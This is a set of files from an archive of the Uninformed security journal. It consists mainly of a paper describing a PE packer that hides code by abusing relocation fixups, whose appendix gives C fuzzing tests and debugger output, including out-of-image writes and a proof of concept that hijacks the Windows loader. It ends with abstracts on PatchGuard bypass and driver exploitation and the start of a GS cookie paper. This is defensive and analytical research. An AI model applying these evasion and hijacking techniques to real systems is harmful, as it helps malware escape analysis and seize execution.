Without relocation information, a binary cannot be relocated to an alternate
base address in an elegant manner (ignoring position independent executables).
The structures used to convey relocation information differs from one binary
format to the next. For the purpose of this paper, only the structures used
to describe relocations of Portable Executable (PE) binaries will be
discussed. However, it should be noted that the approaches described in this
paper should be equally applicable to other binary formats, such as ELF. In
fact, other binary formats make the technique used by locreate even easier.
For example, ELF supports applying relocation fixups with an addend. This
addend is basically an arbitrary value that is used in conjunction with a
transformation. The PE binary format conveys relocation information through
one of the data directories that is included within the optional header
portion of the NT header. This data directory is symbolically referred to
through the use of the IMAGE_DIRECTORY_ENTRY_BASERELOC. The base relocation
data directory consists of zero or more IMAGE_BASE_RELOCATION structures which
are defined as:
typedef struct _IMAGE_BASE_RELOCATION {
ULONG VirtualAddress;
ULONG SizeOfBlock;
// USHORT TypeOffset[1];
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
The base relocation data directory is a little bit different from most other
data directories. The IMAGE_BASE_RELOCATION structures embedded in the data
directory do not occur immediately one after the other. Instead, there are a
variable number of USHORT sized fixup descriptors that separate each
structure. The SizeOfBlock attribute of each structure describes the entire
size of a relocation block. Each relocation block consists of the base
relocation structure and the variable number of fixup descriptors. Therefore,
enumeration of the base relocation data directory is best performed by using
the SizeOfBlock attribute of each structure to proceed to the next relocation
block until none are remaining. The VirtualAddress attribute of each
relocation block is a page-aligned relative virtual address (RVA) that is used
as the base address when processing its associated fixup descriptors. In this
manner, each relocation block describes the relocations that should be applied
to exactly one page.
The fixup descriptors contained within a relocation block describe the address
of the value that should be transformed and the method that should be used to
transform it. The PE format describes about 10 different transformations that
can be used to fixup an address reference. These transformations are conveyed
through the top 4 bits of each fixup descriptor. The bottom 12 bits are used
to describe the offset into the VirtualAddress of the containing relocation
block. Adding the bottom 12 bits of a fixup descriptor to the VirtualAddress
of a relocation block produces the RVA that contains a value that needs to be
transformed. Of the transformation methods that exist, the one most commonly
used on x86 is IMAGE_REL_BASED_HIGHLOW, or 3. This transformation dictates that
the 32-bit displacement between the original base address and the new base
address should be added to the value that exists at the RVA described by the
fixup descriptor. The act of adding the displacement means that the value
will be transformed to make it relative to the new base address rather than
the original base address. To better understand how all of these things tie
together, consider the following source code example:
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char **argv)
{
printf("Hello World.\n");
return 0;
}
When compiled down, this function appears as the following:
sample!main:
00401010 55 push ebp
00401011 8bec mov ebp,esp
00401013 6800104200 push offset sample!__rtc_tzz <PERF> (sample+0x21000) (00421000)
00401018 e80c000000 call sample!printf (00401029)
0040101d 83c404 add esp,4
00401020 33c0 xor eax,eax
00401022 5d pop ebp
00401023 c3 ret
At address 0x00401013, main pushes the address of the string that contains
``Hello World.'':
0:000> db 00421000 L 10
00421000 48 65 6c 6c 6f 20 57 6f-72 6c 64 2e 0a 00 00 00 Hello World.....
In this case, the push instruction is referring to the string using an
absolute address. If the sample executable must be relocated at runtime, the
dynamic loader must be provided with the relocation information necessary to
fixup the reference to the absolute address. The dumpbin.exe utility from
Visual Studio can be used to confirm that this information exists. The first
requirement is that the binary must have relocation information. By default,
all DLLs will contain relocation information, but executables typically do
not. Executables can be compiled with relocation information by using the
/fixed:no linker flag. When a binary is compiled with relocations, the
presence of relocation information is simply indicated by a non-zero
VirtualAddress and Size for the base relocation data directory. These values
can be determined through dumpbin.exe /headers:
26000 [ EE8] RVA [size] of Base Relocation Directory
Since relocation information must be present at runtime, there should also be
a section, typically named .reloc, that contains the virtual mapping
information for the relocation information:
SECTION HEADER #5
.reloc name
1165 virtual size
26000 virtual address (00426000 to 00427164)
2000 size of raw data
24000 file pointer to raw data (00024000 to 00025FFF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
42000040 flags
Initialized Data
Discardable
Read Only
In order to validate that this executable contains relocation information for
the absolute address reference made to the ``Hello World.'' string, the
dumpbin.exe /relocations command can be used:
File Type: EXECUTABLE IMAGE
BASE RELOCATIONS #5
1000 RVA, A8 SizeOfBlock
14 HIGHLOW 00421000
2C HIGHLOW 00420350
...
This output shows the first relocation block which describes the RVA 0x1000.
Each line below the relocation block header describes the individual fixup
descriptors. The information displayed includes the offset into the page, the
type of transformation being performed, and the current value at that location
in the binary. From the disassembly above, the location of the address
reference that is being made is 0x00401014. Therefore, the very first fixup
in this relocation block provides the dynamic loader with the information
necessary to change the address reference to the new base address when the
binary is relocated. If this binary were to be relocated to 0x50000000, the
HIGHLOW transformation would be applied to 0x00401014 as follows. The
displacement between the new base address and the old address would be
calculated as 0x50000000 - 0x00400000, or 0x4fc00000. Adding 0x4fc00000 to
the existing value of 0x00421000 produces 0x50021000 which is subsequently
stored in 0x00401014. This causes the absolute address reference to become
relative to the new base address.
Based on this basic understanding of how relocations are processed, it's now
possible to describe how a packer can be implemented that takes advantage of
the way the dynamic loader processes relocation information. As has been
illustrated above, relocation information is designed to make it possible to
fixup absolute address references at runtime when a binary is relocated.
These fixups are applied by taking into account the displacement between the
new base address and the original base address. More often than not, this
displacement isn't known ahead of time, thus making it impossible to reliably
predict how the content at a specific location in the binary will be altered.
But what if it were possible to deterministically know the displacement in
advance? Knowing the displacement in advance would make it possible to alter
various locations of the binary in a manner that would permit the original
values to be restored by relocations at runtime. In effect, the on-disk
version of the binary could be made to appear quite different from the
in-memory version at runtime. This is the basic concept behind locreate.
In order for locreate to work it must be possible to predict the displacement
reliably. Since the displacement is calculated in relation to the preferred
base address and the expected base address, both values must be known.
Furthermore, the binary must be relocated every time it executes in order for
the relocations to be applied. As it happens, both of these problems can be
solved at once. Since a binary is only guaranteed to be relocated if its
preferred base address is in conflict with an existing address, a preferred
base address must be selected that will always lead to a conflict. This can
be accomplished by setting the preferred base address to any invalid user-mode
address (any address above 0x80000000 inclusive). This assumes that the machine
that the executable will run on is not running with /3GB; if so, a higher
address would have to be used. Alternatively, the base address can be set to
SharedUserData which is guaranteed to be located at 0x7ffe0000 in every
process. Setting the binary's preferred base address to any of these
addresses will force it to be relocated every time it executes. The only
unknown is what address the binary is expected to be relocated to.
Determining the address that will be relocated to depends on the state of the
process' address space at the time that the binary is relocated. If the
binary that's being relocated is an executable, then the process' address
space is generally in a pristine state since the executable is one of the
first things to be mapped into the address space. As such, the first
available address will always be 0x10000 on default installations of Windows.
If the binary is a DLL, it's hard to predict what the state of the address
space will be in all cases. When a conflict does occur, the kernel searches
for an available address region by traversing from lowest to highest address.
For the purposes of this paper, it will be assumed that an executable is being
packed and that the address being relocated to is 0x10000. Further research
may provide insight into how to better control or alter the expected base
address.
With both the preferred base address and the expected base address known, the
only thing that remains is to perform the operations that will transform the
on-disk version of the binary in a manner that causes custom relocations to
restore the binary to its original form at runtime. This process can be both
simplistic and complicated. The simplest approach would be to enumerate over
the contents of each section in the binary, altering the value at each
location by subtracting the displacement and then creating a relocation fixup
descriptor that will ensure that the contents are restored to the expected
value at runtime. This is how the proof of concept works. A more complicated
approach would be to create multiple relocation fixup descriptors per-address.
This would mean that the displacement would need to be subtracted once for
each fixup descriptor. It should also be possible to apply relocations to
individual bytes within a four byte span rather than applying relocations in
four byte increments. Even more interesting would be to use some fixup types
other than HIGHLOW, although this could be seen as something that might make
generating a signature easier.
The end result of this whole process is a functional proof of concept that
packs a binary in the manner described above. To get a feel for how different
the binary looks after being packed, consider what the implementation of main
from earlier in this paper looks like. Notice how the first two instructions
are the same as they were previously. This has to do with the fact that base
addresses must align on 64KB boundaries, and thus the lower two bytes are
not changed. This could be further improved, such as through the strategies
described above:
.text:84011000 loc_84011000:
.text:84011000 push ebp
.text:84011001 mov ebp, esp
.text:84011003 in al, dx
.text:84011004 add [eax+0], dh
.text:84011006 add [edi+edi*8+1209C15h], eax
.text:8401100D test [ebx-3FCCFB3Ch], al
.text:84011013 loope near ptr 84010FD8h
.text:84011015
.text:84011015 loc_84011015:
.text:84011015 push (offset off_8401139C+1)
The locreate proof of concept has been tested on Windows XP and Windows 2003
Server. Initial testing on Windows Vista indicates that Vista does not
properly alter the entry point address after relocations have been applied
when an executable is packed. Even though the proof of concept implementation
works, there are a number of more fundamental problems with the technique
itself.
The first set of problems has to do with techniques that can be used to
signature locreate packed executables. Since locreate relies on injecting a
large number of relocation fixups, it may be possible to heuristically detect
an increased number of relocation fixups with relation to the size of
individual segments. This particular attack could be solved by decreasing the
number of relocation fixups injected by locreate. This would have the effect
of only partially mangling the binary, but it might be enough to make people
wonder what's going on without giving things away. Even if it weren't
possible to heuristically detect an increased number of relocation fixups,
it's definitely possible to detect the fact that an executable packed by
locreate will have an invalid preferred base address that will always result
in a conflict. This fact alone makes it mostly trivial to at least detect
that something odd is going on.
Detection is only the first problem, however. Once a locreate packed
executable has been detected, the next logical step is to attempt to figure
out some way of obtaining the original executable. Since locreate relies on
relocation fixups to do this, the only thing one would have to do in order to
obtain the original binary would be to relocate the executable to the expected
base address that was used when the binary was packed, such as 0x10000. While
it's trivial to develop tools to perform this action, the Interactive
Disassembler (IDA) already supports it. When opening an executable, the
``Manual Load'' checkbox can be toggled. This will cause IDA to prompt the
user to enter the base address that the binary should be loaded at. When the
base address is entered, IDA processes relocations and presents the relocated
binary image. The mitigating factor here is that the user must know the
expected base address, otherwise the binary will still appear completely
mangled when it's relocated to the wrong base address.
In the author's opinion, these problems make locreate a sub-par packer. At
best it should be viewed as an interesting approach to the problem of packing
executables, but it should not be relied upon as a means of thwarting static
analysis. Anyone who reads this paper will have the tools necessary to unpack
executables that have been packed by locreate. With that said, it should be
noted that there is still an opportunity for further research that could help
to identify ways of improving locreate. For instance, a better understanding
of differences in the way the dynamic loader and existing static analysis
tools process relocation fixups could provide some opportunity for
improvement. Results from some of the author's initial tests of these ideas
are included in appendix A. Here's a brief list of some differences that could
exist:
1. Different behaviors when processing fixups
It's possible that the dynamic loader and static analysis tools such as IDA
may not support the same set of fixup types. Furthermore, they may not
process fixup types in the same way. If differences do exist, it may be
possible to create a packed executable that will work correctly when used
against the dynamic loader but not render properly when relocated using a
static analysis tool such as IDA.
2. Relocation blocks with non-page-aligned VirtualAddress fields
It's unknown whether or not the dynamic loader and static analysis tools are
able to properly handle relocation blocks that have non-page-aligned
VirtualAddress's. In all normal circumstances, VirtualAddress will be
page aligned.
3. Relocation blocks that modify other relocation blocks
An interesting situation that may lead to differences between the dynamic
loader and static analysis tools has to do with relocation blocks that modify
other relocation blocks. In this way, the relocation information that exists
on disk is not what is actually used, in its entirety, when relocating an
image during runtime.
Even if research into these topics doesn't yield any direct improvements to
locreate, it should nonetheless provide some interesting insight into the way
that different applications handle relocation processing. And after all,
gaining knowledge is what it's really all about.
Appendix A) Differences in Relocation Processing
This appendix attempts to describe some tests that were run on different
applications that process relocation entries for binary files. Identifying
differences may make it possible to have a binary that will work correctly
when executed but not when analyzed by a static analysis tool such as IDA. To
test out these ideas, the author threw together a small relocation fuzzing
tool that is aptly named relocfuzz. This tool will take a pre-existing binary
and create a new one with custom relocations. The code for this tool can be
found in the other code associated with this paper.
The tests included in this appendix were performed against three different
applications: the dynamic loader (ntdll.dll), IDA, and dumpbin. If the same
tests are run against other applications, the author would be interested in
knowing the results.
A.1) Non-page-aligned Block VirtualAddress
In all normal cases, relocation blocks will be created with a page-aligned
VirtualAddress. However, it's unclear if non-page-aligned VirtualAddress
fields will be handled correctly when relocations are processed. There are
some interesting implications of non-page-aligned VirtualAddresses. In many
applications, such as the dynamic loader, it's critical that addresses
referenced through RVAs are validated so as to prevent references being made
to external addresses. For example, if relocations were processed in
kernel-mode, it would be critical that checks be performed to ensure that RVAs
don't end up making it possible to reference kernel-mode addresses. The
reason why non-page-aligned VirtualAddresses are interesting is that they
leave open the possibility of this type of attack.
Consider the scenario of a binary that is relocated to 0x7ffe0000, ignoring
for the moment that SharedUserData already exists at this location. Now,
consider that this binary has a relocation block with a virtual address of
0x1ffff. This address is not page-aligned. Now, consider that this
relocation block has a fixup descriptor that indicates that at offset 0x4 into
this page, a certain type of fixup should be performed. This would equate to
modifying memory at 0x80000003, a kernel-mode address. If relocations were
being processed in kernel-mode, like they are on Windows Vista for ASLR, then
a failure to check that the actual address being written to would result in a
dangerous condition.
Here's an example of some code that attempts to test out this idea:
static VOID TestNonPageAlignedBlocks(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT KillerBlock = AllocateRelocationBlockContext(1);
PrependRelocationBlockContext(
FuzzContext,
KillerBlock);
KillerBlock->Rva = 0x10001;
KillerBlock->Fixups[0] = (3 << 12) | 0;
}
In this example, a custom relocation block is created with one fixup
descriptor. The VirtualAddress associated with the block is set to 0x10001
and the first fixup descriptor is set to modify offset 0 into that RVA. If
the binary that is hosting these relocations is relocated to 0x10000, a write
should occur to 0x20001 when processing the relocations. Here are the results
from a few initial tests:
ntdll.dll: The relocation fixup is processed and results in a write
to 0x20001.
IDA: Ignores the relocation fixup, though seemingly only because the fixup
targets memory outside of the executable.
dumpbin.exe: Parses the relocation block without issue.
A.2) Writing to External Addresses
Due to the fact that the VirtualAddress associated with each relocation block
is a 32-bit RVA, it is possible to create relocation blocks that have RVAs
that actually reside outside of the mapped executable that is being relocated.
This is important because if steps aren't taken to detect this scenario, the
application processing the relocation fixups might be tricked into writing to
memory that is external to the mapped binary. Creating a test-case for this
example is trivial:
static VOID CreateExternalWriteRelocationBlock(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT ExtBlock = AllocateRelocationBlockContext(2);
ExtBlock->Rva = 0x10000;
ExtBlock->Fixups[0] = (3 << 12) | 0x0;
ExtBlock->Fixups[1] = (3 << 12) | 0x1;
PrependRelocationBlockContext(
FuzzContext,
ExtBlock);
}
In this test, a relocation block is created that has a VirtualAddress of
0x10000. When the binary is relocated to 0x10000, the actual address of the
region that will be written to is 0x20000. In almost all versions of Windows
NT, this address is the location of the process parameters structure. The
block itself contains two fixup descriptors, each of which will result in a
write to the first few bytes of the process parameters structure. The results
after running this test are:
ntdll.dll: The relocation fixup is processed and results in two 32-bit writes
to 0x20000 and 0x20001.
IDA: Ignores RVAs outside of the executable.
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
A.3) Self-updating Relocation Blocks
One of the more interesting nuances of the way relocation fixups are
processed is that it's actually possible to create a relocation block that
will perform fixups against other relocation blocks. This has the effect of
making it such that the relocation information that appears on disk is
actually different than what is processed when relocation fixups are applied.
The basic idea behind this approach is to prepend certain relocation blocks
that apply fixups to subsequent relocation blocks. This all works because
relocation blocks are typically processed in the order that they appear. An
example of this basic concept is shown below:
static VOID PrependSelfUpdatingRelocations(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT SelfBlock;
PRELOCATION_BLOCK_CONTEXT RealBlock;
ULONG RelocBaseRva;
ULONG NumberOfBlocks = FuzzContext->NumberOfBlocks;
ULONG Count;
//
// Grab the base address that relocations will be loaded at
//
RelocBaseRva = FuzzContext->BaseRelocationSection->VirtualAddress;
//
// Grab the first block before we start prepending
//
RealBlock = FuzzContext->NewRelocationBlocks;
//
// Prepend self-updating relocation blocks for each block that exists
//
for (Count = 0; Count < NumberOfBlocks; Count++)
{
PRELOCATION_BLOCK_CONTEXT RelocationBlock;
RelocationBlock = AllocateRelocationBlockContext(2);
PrependRelocationBlockContext(
FuzzContext,
RelocationBlock);
}
//
// Walk through each self updating block, fixing up the real blocks to
// account for the amount of displacement that will be added to their Rva
// attributes.
//
for (SelfBlock = FuzzContext->NewRelocationBlocks, Count = 0;
Count < NumberOfBlocks;
Count++, SelfBlock = SelfBlock->Next, RealBlock = RealBlock->Next)
{
SelfBlock->Rva = RelocBaseRva + RealBlock->RelocOffset;
//
// We'll relocate the two least significant bytes of the real block's RVA
// and SizeOfBlock.
//
SelfBlock->Fixups[0] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
(((RealBlock->RelocOffset - 2) & 0xfff)));
SelfBlock->Fixups[1] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
(((RealBlock->RelocOffset + 2) & 0xfff)));
SelfBlock->Rva &= ~(PAGE_SIZE-1);
//
// Account for the amount that will be added by the dynamic loader after
// the first self-updating relocation blocks are processed.
//
*(PUSHORT)(&RealBlock->Rva) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
*(PUSHORT)(&RealBlock->SizeOfBlock) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
}
}
This test works by prepending a self-updating relocation block for each
relocation block that exists in the binary. In this way, if there were two
relocation blocks that already existed, two self-updating relocation blocks
would be prepended, one for each of the two existing relocation blocks.
Following that, the self-updating relocation blocks are populated. Each
self-updating relocation block is created with two fixup descriptors. These
fixup descriptors are used to apply fixups to the VirtualAddress and
SizeOfBlock attributes of its corresponding existing relocation block. Since
a HIGHLOW fixup with a page-aligned displacement effectively modifies only the
two most significant bytes of the target dword, the RVAs of the corresponding
fields are adjusted down by two so that the write lands on each field's low
word. The end result of this
operation is that the first n relocation blocks are responsible for fixing up
the VirtualAddress and SizeOfBlock attributes associated with subsequent
relocation blocks. When relocations are processed in a linear fashion, the
subsequent relocation blocks are updated in a way that allows them to be
processed correctly.
Running this test against the set of test applications produces the following
results:
ntdll.dll: The relocation blocks are fixed up accordingly and the application
executes as expected.
IDA: Initial testing indicates that IDA is capable of handling self-updating
relocation blocks.
dumpbin.exe: Crashes as the result of apparently corrupt relocation blocks:
DUMPBIN : fatal error LNK1000:
Internal error during
DumpBaseRelocations
Version 8.00.50727.42
ExceptionCode = C0000005
ExceptionFlags = 00000000
ExceptionAddress = 00443334
NumberParameters = 00000002
ExceptionInformation[ 0] = 00000000
ExceptionInformation[ 1] = 7FFA2000
CONTEXT:
Eax = 0000000A Esp = 0012E500
Ebx = 00004F00 Ebp = 00000000
Ecx = 7FFA2000 Esi = 00000000
Edx = 781C3B68 Edi = 7FFA2000
Eip = 00443334 EFlags = 00010293
SegCs = 0000001B SegDs = 00000023
SegSs = 00000023 SegEs = 00000023
SegFs = 0000003B SegGs = 00000000
Dr0 = 00000000 Dr3 = 00000000
Dr1 = 00000000 Dr6 = 00000000
Dr2 = 00000000 Dr7 = 00000000
A.4) Integer Overflows in Size Calculations
A potential source of mistakes that could be made when processing relocations
has to do with the handling of the SizeOfBlock attribute of a relocation
block. There is a potential for an integer overflow to occur in applications
that don't properly handle situations where the SizeOfBlock attribute is less
than the size of the base relocation structure (which is 8 bytes). In order
to calculate the total number of fixups in a section, it's common to see a
calculation like (Block->SizeOfBlock - 8) / 2. However, if a check isn't made
to ensure that SizeOfBlock is at least 8, an integer overflow will occur. If
this happens, the application processing relocations would be tricked into
processing a very large number of relocations. An example of a test for this
issue is shown below:
static VOID TestIntegerOverflow(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT EvilBlock = AllocateRelocationBlockContext(0);
EvilBlock->SizeOfBlock = 0;
EvilBlock->Rva = 0x1000;
PrependRelocationBlockContext(
FuzzContext,
EvilBlock);
}
In this example, a relocation block is created that has its SizeOfBlock
attribute set to zero. This is invalid because the minimum size of a block is
8 bytes. The results of this test against different applications are shown
below:
ntdll.dll: Does not perform appropriate checks which appears to result in an
integer overflow:
(9d4.6dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00014008 ecx=00011000 edx=80010000 esi=00015000 edi=ffffffff
eip=7c91e163 esp=0013fa98 ebp=0013faac iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!LdrProcessRelocationBlockLongLong+0x1a:
7c91e163 0fb706 movzx eax,word ptr [esi] ds:0023:00015000=????
IDA: Ignores the relocation block, but may not process relocations correctly
as a result (unclear at this point).
dumpbin.exe: Refuses to show relocations:
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file foo.exe
File Type: EXECUTABLE IMAGE
BASE RELOCATIONS #4
Summary
1000 .data
1000 .rdata
1000 .reloc
1000 .text
A.5) Consistent Handling of Fixup Types
Applications that process relocation fixups may also differ in their level of
support for different types of fixups. While most binaries today use the
HIGHLOW fixup exclusively, there are still quite a few other types of fixups
that can be applied. If differences in the way relocation fixups are
processed can be identified, it may be possible to create a binary that
relocates correctly in one application but not in another application. The
following code demonstrates an example of this type of test:
static VOID TestConsistentRelocations(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(16);
ULONG Rva = FuzzContext->BaseRelocationSection->VirtualAddress;
INT Index;
PrependRelocationBlockContext(
FuzzContext,
Block);
Block->Rva = 0x1000;
for (Index = 0; Index < 16; Index++)
{
//
// Skip invalid fixup types
//
if ((Index >= 6 && Index <= 8) ||
(Index >= 0xb && Index <= 0x10))
continue;
Block->Fixups[Index] = (Index << 12) | Index;
}
}
This test works by prepending a relocation block that contains a relocation
fixup for each different valid fixup type. This results in a relocation block
that looks something like this:
BASE RELOCATIONS #4
1000 RVA, 28 SizeOfBlock
0 ABS
1 HIGH EC8B
2 LOW 8BEC
3 HIGHLOW 5008458B
4 HIGHADJ 0845 (5005)
0 ABS
0 ABS
0 ABS
9 IMM64
A DIR64 8000209C15FF8000
0 ABS
0 ABS
0 ABS
0 ABS
0 ABS
The results for this test are shown below:
ntdll.dll: While not confirmed, it is assumed that the dynamic loader performs
all fixup types correctly. This results in the following code being produced
in the test binary:
foo+0x1000:
00011000 55 push ebp
00011001 8c6c8b46 mov word ptr [ebx+ecx*4+46h],gs
00011005 895068 mov dword ptr [eax+68h],edx
00011008 1830 sbb byte ptr [eax],dh
0001100a 0100 add dword ptr [eax],eax
0001100c 00b69b200100 add byte ptr foo+0x209b (0001209b)[esi],dh
00011012 83c408 add esp,8
IDA: Appears to handle some relocation fixup types differently than the
dynamic loader. The result of IDA relocating the same binary results in the
following being produced:
.text:00011000 push ebp
.text:00011001 mov ebp, esp
.text:00011003 mov eax, [ebp+9]
.text:00011006 shr byte ptr [eax+18h], 1 ; "Called TestFunction()\n"
.text:00011009 xor [ecx], al
.text:00011009
.text:0001100B db 0
.text:0001100C
.text:0001100C add byte ptr ds:printf[esi], dl
.text:00011012 add esp, 8
Equates to:
.text:00011000 55 8B EC 8B 45 09 D0 68 18 30 01 00 00 96 9C 20
.text:00011010 01 00 83 C4 08 C7 05 50
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
A.6) Hijacking the Dynamic Loader
Since the dynamic loader in previous tests proved to be capable of writing to
areas of memory external to the executable binary, it makes sense to test to
see if it's possible to hijack execution control. One method of approaching
this would be to have the dynamic loader apply a relocation to the return
address of the function used to process relocations. When the function
returns, it'll transfer control to whatever address the relocations have
caused it to point to. An example of the code for this test is shown below:
static VOID TestHijackLoader(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(1);
PrependRelocationBlockContext(
FuzzContext,
Block);
//
// Set the RVA to the address of the return address on the stack taking into
// account the displacement.
//
Block->Rva = 0x0012fab0;
Block->Fixups[0] = (3 << 12) | 0;
}
When a binary is executed that contains this relocation block, the dynamic
loader ends up applying a relocation to the return address located at
0x13fab0. Obviously, this address may be subject to change quite frequently,
but as a means of illustrating a proof of concept it should be sufficient.
And, just as one would expect, the dynamic loader does indeed overwrite the
return address and make it possible to gain control of execution:
(c88.184): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0001400a ebx=00014008 ecx=0013fab0 edx=80010000 esi=00000001 edi=ffffffff
eip=fc92e10b esp=0013fac8 ebp=0013fae4 iopl=0         nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
fc92e10b ?? ???
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013fac4 00010000 00261f18 7ffdc000 80010000 0xfc92e10b
0013fae4 7c91e08c 00010000 00000000 00000000 image00010000
0013fb08 7c93ecd3 00010000 7c93f584 00000000 ntdll!LdrRelocateImage+0x1d (FPO: [Non-Fpo])
0013fc94 7c921639 0013fd30 7c900000 0013fce0 ntdll!LdrpInitializeProcess+0xea0 (FPO: [Non-Fpo])
0013fd1c 7c90eac7 0013fd30 7c900000 00000000 ntdll!_LdrpInitialize+0x183 (FPO: [Non-Fpo])
00000000 00000000 00000000 00000000 00000000 ntdll!KiUserApcDispatcher+0x7
Bibliography
[1] Carrera, Ero. Packer Tracing.
http://nzight.blogspot.com/2006/06/packer-tracing.html;
accessed Dec 15, 2006.
[2] Szor, Peter. Advanced Code Evolution Techniques and Computer Virus Generator Kits.
http://www.informit.com/articles/article.asp?p=366890&seqNum=3&rl=1;
accessed Jan 8, 2007.
[3] Szor, Peter. Tricky Relocations.
http://peterszor.com/resurrel.pdf;
accessed Jan 8, 2007.
uninformed/6.3.txt (file diff suppressed: too large)

uninformed/6.txt
Engineering in Reverse
Subverting PatchGuard Version 2
Skywing
Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely. Potential solutions to these bypass techniques are also suggested. Additionally, this paper describes a mechanism by which PatchGuard version 2 can be subverted to run custom code in place of PatchGuard's system integrity checking code, all while leaving no traces of any kernel patching or custom kernel drivers loaded in the system after PatchGuard has been subverted. This is particularly interesting from the perspective of using PatchGuard's defenses to hide kernel mode code, a goal that is (in many respects) completely contrary to what PatchGuard is designed to do.
pdf | txt | code.tgz | html
Locreate: An Anagram for Relocate
skape
This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper.
pdf | txt | code.tgz | html
Exploitation Technology
Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
Johnny Cache, H D Moore, skape
This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised.
pdf | txt | code.tgz | html
uninformed/7.1.txt
Reducing the Effective Entropy of GS Cookies
skape
mmiller@hick.org
3/2007
1) Foreword
Abstract: This paper describes a technique that can be used to reduce the
effective entropy in a given GS cookie by roughly 15 bits. This reduction is
made possible because GS uses a number of weak entropy sources that can, with
varying degrees of accuracy, be calculated by an attacker. It is important to
note, however, that the ability to calculate the values of these sources for
an arbitrary cookie currently relies on an attacker having local access to the
machine, such as through the local console or through terminal services. This
effectively limits the use of this technique to stack-based local privilege
escalation vulnerabilities. In addition to the general entropy reduction
technique, this paper discusses the amount of effective entropy that exists in
services that automatically start during system boot. It is hypothesized that
these services may have more predictable states of entropy due to the relative
consistency of the boot process. While the techniques described in this paper
do not illustrate a complete break of GS, any inherent weakness can have
disastrous consequences given that GS is a static, compile-time security
solution. It is not possible to simply distribute a patch. Instead,
applications must be recompiled to take advantage of any security
improvements. In that vein, the paper proposes some solutions that could
be applied to address the problems that are outlined.
Thanks: Aaron Portnoy for lending some hardware for sample collection.
Johnny Cache and Richard Johnson for discussions and suggestions.
2) Introduction
Stack-based buffer overflows are generally regarded as one of the most common
and easiest to exploit classes of software vulnerabilities. This prevalence
has lead to the implementation of many security solutions that attempt to
prevent the exploitation of these vulnerabilities. Some of these solutions
include StackGuard[1], ProPolice[2], and Microsoft's /GS compiler switch[5]. The
shared premise of these solutions involves the placement of a cookie, or
canary, between the buffers stored in a stack frame and the stack frame's
return address. The cookie that is placed on the stack is used as a marker to
detect if a buffer overflow has occurred prior to allowing a function to
return. This simple concept can be very effective at making the exploitation
of stack-based buffer overflows unreliable.
The cookie-based approach to detecting stack-based buffer overflows involves
three general steps. First, a cookie that will be inserted into a function's
stack frame must be generated. The approaches taken to generate cookies vary
quite substantially, some having more implications than others. Once a cookie
has been generated, it must be pushed onto the stack in the context of a
function's prologue at execution time. This ensures that the cookie is placed
before the return address (and perhaps other values) on the stack. Finally, a
check must be added to a function's epilogue to make sure that the cookie that
was stored in the stack frame is the value that it was initialized to in the
function prologue. If an overflow of a stack-based buffer occurs, then it's
likely that it will have overwritten the cookie stored after the buffer. When
